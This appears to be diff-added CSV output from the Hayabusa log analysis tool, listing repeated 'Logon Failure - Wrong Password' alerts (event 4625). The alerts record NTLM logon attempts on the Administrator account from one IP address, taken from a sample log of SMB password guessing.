+2016-09-20 01:52:45.885 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t7a9Tvr6ruDpiG2T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NBNIizCKz2ybc3eM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.961 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YwuXQhISpgfSFqZ9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.011 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yeONLdrrauxqvgaT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.058 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RFqSH4toadsTideV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.104 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HuMa0Juj1tjL6NDY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.145 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UA8zU0kJ6gAFqSaF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jvX85gF8wk3AGJyb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.241 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OpzOMKQIBrkQW5Os | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.285 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cqzrLAqHNi4CHT56 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.326 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HWMap8qHlykO6Yeu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.369 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pkc9LWakJBjhBQv6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.416 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y43cE75gTzA1XjHF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9HopaYDAbYxHjJEr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.499 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: brNgudTWJaKs8nLd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MzPwOqU92kdGodBH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.645 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IXlzxK5OXL9hpqrZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2cLdgWvrVh7h2jPk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.717 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h34xlYavVsXQRCYG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6wjflwqXyFzYTi0b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.795 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MlsuCSajqGUYTBWL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xQDdrQQZ5xYBDiRi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.872 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JX5NMuwUsOZEp3zh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JfrbGLqKGru8AE2a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.961 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 813natbodi6QauRW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KpfKxOZG3xSr5Yqm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fErWiEb0USDghXsB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.083 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fOWF6YnW8UEPlw41 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SNPXuHduatLFQc8W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.157 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 35rfur4MzKzwxCIn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.201 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VmAqzaZaeoSjcuh5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.238 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lKuCpuGcGmDOoewr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.281 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bz6SOAeTyqsBz6Oa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.317 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CSURiEoC7dw0w0ru | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.369 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bDjwkaHT8lrFmn9X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ayI129HgVWA5q4Sk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jT2yiuOJS8Fvf9SD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.495 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1hpAO2UrjFd6Kxt0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.537 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZkgGj9Fnqn3XwnBT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WFXPYo0yzR7p8dNU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9j6MxN7PuM29Vlcq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w1CWIqoV6GzmmlRm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uiBfvnfTcIG4xJoi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.741 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dED7HYntoE5D7XvG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.781 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pX1ztnCKiePrPbTT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u3XQcfMHJDsBtJDy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.864 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MhRsRIS5tHKLv2oL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.917 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JmkLhptugDU2fDWp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.952 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2yk62yREbgDCj9pB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.997 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6JPvkmaAsJlwn9t3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.034 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lhciP1zM9njlRI3j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.069 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: duNDenwdo1oHVuoL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.114 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0ChBZOYkTm1SguA1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RU38tuiKC0weexmb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jg0Hp4xtz0pAMhCz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.231 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5AorVNz5MgTeEvn2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.275 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8oJ6tVjBxlYyj5ej | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oEAEOi0TsSRVPlz4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: USfEwKkH8OUADVds | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.400 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y0jg1i6tDiInd10i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.441 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xv2jRzrgoP6lJdAJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.485 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LmuAXUwSkhR3tSRg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.535 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zy4Fkpvcrlmp9AES | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.572 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 51ipUXvrRh0CPH1e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.670 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5TB15XKzVJwIyjqU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.713 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i1F6muFPBlPyHPbR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XNXwYS73RElHozUo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ft1MLPJISeq0bMsa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.845 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i8kbFOwQiCyRVMDV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.879 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ToPzuDEmXN1fjIcS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pKF1QKEuTXIGnrx2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.964 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fyHpo6pX8TEo6ttv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:49.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3uYqEt90yr8B3rK9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:49.048 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2LKkrM0slVn0CKHw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
